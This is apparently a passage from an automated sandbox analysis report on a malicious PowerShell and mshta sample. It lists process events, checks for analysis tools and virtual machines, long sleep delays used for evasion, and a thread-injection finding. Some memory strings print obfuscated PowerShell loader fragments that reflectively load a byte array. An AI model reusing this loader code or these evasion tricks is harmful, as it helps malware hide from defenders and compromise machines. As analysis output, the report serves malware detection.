                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE%HTTPDEBUGGERUI.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE%HTTPANALYZERV7.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESS.EXE#PROCESSHACKER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6928Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2941Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7779Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1935Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8689Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 969Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4307Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1955Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4561Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1166Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 6928 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 2941 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2216Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA 3D
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8062D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Video
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.Noney*
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MDF5Z6ZO?Microsoft Basic Display Adapter/Microsoft Hyper-V Video
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.None7adc3
                      Source: powershell.exe, 00000006.00000002.1598957271.000001BEFA4CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System Product889ROK88AE2742-2B8C-0221-A586-225B8451ACF0VMware, Inc.Noney*
                      Source: powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
                      Source: powershell.exe, 00000006.00000002.1594888684.000001BEFA423000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW -%SystemRoot%\system32\mswsock.dllGkWQGkWOGkW4GkW=GkW[GkWRGkWeGkWfGkWlGkWeGkWcGkWtGkWiGkWoGkWnGkW.GkWAGkWsGkWsGkWeGkWmGkWbGkWlGkWyGkW]GkW:GkW:GkWLGkWoGkWaGkWdGkW(GkW[GkWbGkWyGkWtGkWeGkW[GkW]GkW]GkW$GkWIGkW9GkWCGkWGGkWVGkW)GkW'.Replace('GkW', ''); $qYlCF = $EHQ
                      Source: powershell.exe, 00000008.00000002.2791146764.000002255F828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRL%SystemRoot%\system32\mswsock.dllRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 5968Jump to behavior
